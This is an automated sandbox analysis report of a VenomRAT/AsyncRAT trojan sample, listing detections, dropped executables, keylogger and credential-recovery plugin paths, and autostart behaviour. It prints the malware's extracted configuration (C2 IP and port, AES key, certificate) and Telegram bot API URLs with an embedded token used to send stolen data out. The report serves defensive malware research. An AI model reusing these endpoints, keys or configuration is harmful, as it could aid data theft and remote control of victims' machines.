https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage	false	Avira URL Cloud: safe	unknown
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument	false	Avira URL Cloud: safe	unknown
http://ip-api.com/line/?fields=hosting	false	URL Reputation: safe	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Avira: detection malicious, Label: HEUR/AGEN.1307453
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Avira: detection malicious, Label: HEUR/AGEN.1307453
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Avira: detection malicious, Label: TR/Spy.Agent.qbvjl

Found malware configuration

Source: 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: VenomRAT {"Server": "66.235.168.242", "Ports": "3232", "Version": "", "Autorun": "true", "Install_Folder": "%AppData%", "Install_File": "Loaader.exe", "AES_key": "tE8IGfk7UYxxW5jF9uxnGzkxU8UnVy3F", "Mutex": "iFe4z2UwXC6AffU6", "Certificate": "MIICKTCCAZKgAwIBAgIVAOwI49vECmkjcVi6vDRu+6lTwBelMA0GCSqGSIb3DQEBDQUAMF0xDjAMBgNVBAMMBUVCT0xBMRMwEQYDVQQLDApxd3FkYW5jaHVuMRwwGgYDVQQKDBNEY1JhdCBCeSBxd3FkYW5jaHVuMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjMwNjI0MTA1NzMxWhcNMzQwNDAyMTA1NzMwWjAQMQ4wDAYDVQQDDAVEY1JhdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAwLjfJLJldOS/ukdvNaxCeCKlqSDodMxbIlUBJFj4ifPzaijU+Qc9+Jdvhi6ZCNs9E/uBCzQd+fJoEornr5T4fZqOQIS2naeK29VzB3/xJlBW3faQNOQXicF/HSbX0ljWeGIbgZr/lpicEtjGgA1RGEt0zY2hVTNIufmV3WTYnLkCAwEAAaMyMDAwHQYDVR0OBBYEFE37VDHHP+vN1IXecEP/zz0inroMMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEAaFlOwVBtr2Q4kDD0D5vcnSs/NiWSEKiRtNBVph0GxdbQXeE7epqNbjAM8aVZRDFw4hMP1gxetRk+Olcgp6/RDLzmei9uIydxJ8dk+KsCu0zWoL9yNWBx2BwVBNa7k3gAvh+CNuHFwb04ZG8kLR93TyFRZDUHUWglVnA3DQwJqrw=", "ServerSignature": "iMAOwDJA0vMpVx4GkSywNj1D9PkiTGYL8k2vajxwK0ZTkgcoy6ziEU37PU07UskWTqs4CQy9wpx58wUw1AAp0a59QrAxozzZ/IsZBApD2Cr3P8v6ZVT8lHLZwC7Rvm+MFMotN8SBl4jk9ACD4dSwXvpgx0mYcM4Mkw7WfxAX6J8=", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "1", "Group": "Default", "AntiProcess": "false", "AntiVM": "false"}
Source: 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: AsyncRAT {"Ports": ["3232"], "Server": ["66.235.168.242"], "Certificate": "MIICKTCCAZKgAwIBAgIVAOwI49vECmkjcVi6vDRu+6lTwBelMA0GCSqGSIb3DQEBDQUAMF0xDjAMBgNVBAMMBUVCT0xBMRMwEQYDVQQLDApxd3FkYW5jaHVuMRwwGgYDVQQKDBNEY1JhdCBCeSBxd3FkYW5jaHVuMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjMwNjI0MTA1NzMxWhcNMzQwNDAyMTA1NzMwWjAQMQ4wDAYDVQQDDAVEY1JhdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAwLjfJLJldOS/ukdvNaxCeCKlqSDodMxbIlUBJFj4ifPzaijU+Qc9+Jdvhi6ZCNs9E/uBCzQd+fJoEornr5T4fZqOQIS2naeK29VzB3/xJlBW3faQNOQXicF/HSbX0ljWeGIbgZr/lpicEtjGgA1RGEt0zY2hVTNIufmV3WTYnLkCAwEAAaMyMDAwHQYDVR0OBBYEFE37VDHHP+vN1IXecEP/zz0inroMMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEAaFlOwVBtr2Q4kDD0D5vcnSs/NiWSEKiRtNBVph0GxdbQXeE7epqNbjAM8aVZRDFw4hMP1gxetRk+Olcgp6/RDLzmei9uIydxJ8dk+KsCu0zWoL9yNWBx2BwVBNa7k3gAvh+CNuHFwb04ZG8kLR93TyFRZDUHUWglVnA3DQwJqrw=", "Server Signature": "iMAOwDJA0vMpVx4GkSywNj1D9PkiTGYL8k2vajxwK0ZTkgcoy6ziEU37PU07UskWTqs4CQy9wpx58wUw1AAp0a59QrAxozzZ/IsZBApD2Cr3P8v6ZVT8lHLZwC7Rvm+MFMotN8SBl4jk9ACD4dSwXvpgx0mYcM4Mkw7WfxAX6J8="}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Client.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Roaming\Loaader.exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Roaming\Loader.exe	ReversingLabs: Detection: 81%

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	ReversingLabs: Detection: 73%
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Virustotal: Detection: 82%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF8491200F2 CryptUnprotectData,		20_2_00007FF8491200F2
Source: C:\Users\user\AppData\Roaming\Loader.exe	Code function: 20_2_00007FF84912DDB5 CryptUnprotectData,		20_2_00007FF84912DDB5

Uses 32bit PE files

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 104.21.44.66:443 -> 192.168.2.5:61173 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61013 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:61014 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61016 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61017 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61033 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61036 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61038 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:61040 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61044 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61063 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61065 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61071 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61079 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61096 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61110 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61113 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61116 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61120 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61131 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61132 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61134 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61136 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61137 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61139 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61140 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61142 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61145 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61146 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61149 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61153 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61164 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61166 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61170 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61174 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61176 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61177 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61180 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61183 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61184 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61186 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61187 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61189 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61190 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61192 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61193 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61194 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61195 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61199 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61201 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61201 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61203 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61205 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61207 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61209 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61211 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61213 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61216 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61217 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61218 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61220 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61221 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61223 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61225 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61226 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61227 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61228 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61229 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61231 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61232 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61233 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61234 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61236 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61243 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61244 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61245 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61247 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61248 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61251 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61252 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61255 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61256 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61258 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61259 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61260 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61262 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61266 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61271 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61273 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61274 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61278 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61279 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61282 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61286 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61289 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61291 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61292 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61293 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61295 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61297 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61298 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61299 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61300 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61301 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61302 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61304 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61306 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61307 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61309 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61310 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61311 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61312 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61313 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61316 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61317 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61319 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61320 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61321 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61322 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:61324 version: TLS 1.2

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: %costura.messagepacklib.pdb.compressed source: Loader.exe, 00000014.00000002.2527964251.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: costura.costura.pdb.compressed source: Loaader.exe, 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Keylogger.pdb source: Loader.exe, 00000014.00000002.2813392889.000000001CC40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: tion.pdb source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb`- source: WER3812.tmp.dmp.30.dr
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: Loader.exe, 00000014.00000002.2860415941.000000001D617000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER3812.tmp.dmp.30.dr
Source:	Binary string: WinDefend.pdb source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005938092.0000000012919000.00000004.00000800.00020000.00000000.sdmp, WinDefend.exe, 00000004.00000000.2004261528.0000000000BEC000.00000002.00000001.01000000.00000008.sdmp, WinDefend.exe.0.dr
Source:	Binary string: lib.pdbX source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER3812.tmp.dmp.30.dr
Source:	Binary string: 0C:\Windows\mscorlib.pdb source: Loader.exe, 00000014.00000002.2860415941.000000001D617000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: SendMemory.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Core.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: Logger.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb^ source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Keylogger.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000002F.00000002.3065403253.0000029A21DC5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Recovery.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Dynamic.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Recovery.pdb source: Loader.exe, 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: MessagePackLib.pdbzZ) source: WER3812.tmp.dmp.30.dr
Source:	Binary string: mscorlib.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: SendMemory.pdb g source: WER3812.tmp.dmp.30.dr
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Logger.pdb source: Loader.exe, 00000014.00000002.2746255140.000000001B4A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: mscorlib.pdb Operatin source: powershell.exe, 0000002F.00000002.3076280721.0000029A21FE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbP source: WER3812.tmp.dmp.30.dr
Source:	Binary string: Extra.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER3812.tmp.dmp.30.dr
Source:	Binary string: symbols\dll\mscorlib.pdbpdb source: Loader.exe, 00000014.00000002.2860415941.000000001D617000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\MessagePack\bin\Release\MessagePackLib.pdb source: Loader.exe, 00000014.00000002.2812581762.000000001CA40000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: Extra.pdb` source: WER3812.tmp.dmp.30.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Xml.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.ni.pdbRSDS source: WER3812.tmp.dmp.30.dr
Source:	Binary string: Microsoft.CSharp.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: lib.pdb source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\SendMemory.pdb source: Loader.exe, 00000014.00000002.2744256904.000000001B430000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: Loaader.exe, 00000015.00000002.3394522285.0000000013094000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3269125954.00000000014A0000.00000004.08000000.00040000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.000000001319F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Configuration.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: Logger.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Xml.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 0000002F.00000002.3076280721.0000029A21FE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: C:\Users\Ninja\Downloads\dcrat_fix-master\dcrat_fix-master\MessagePack\bin\Release\MessagePackLib.pdb source: Loaader.exe, 00000015.00000002.3552953263.000000001CB50000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: costura.dotnetzip.pdb.compressed source: Loader.exe, 00000014.00000002.2527964251.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb@ source: WER3812.tmp.dmp.30.dr
Source:	Binary string: costura.polly.pdb.compressed source: Loaader.exe, 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Management.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Management.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Core.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: MessagePackLib.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: ion.pdb source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: orlib.pdb source: Loader.exe, 00000014.00000002.2860415941.000000001D617000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: n.pdb; source: powershell.exe, 0000002F.00000002.3070481830.0000029A21FA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER3812.tmp.dmp.30.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER3812.tmp.dmp.30.dr
Source:	Binary string: C:\Users\fastf\Desktop\Venom RAT + HVNC New Update\NNProject\Binaries\Release\Plugins\Extra.pdb source: Loader.exe, 00000014.00000002.2744918575.000000001B440000.00000004.08000000.00040000.00000000.sdmp

Creates COM task schedule object (often to register a task for autostart)

Source: C:\Users\user\AppData\Roaming\Loader.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Loader.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Loader.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
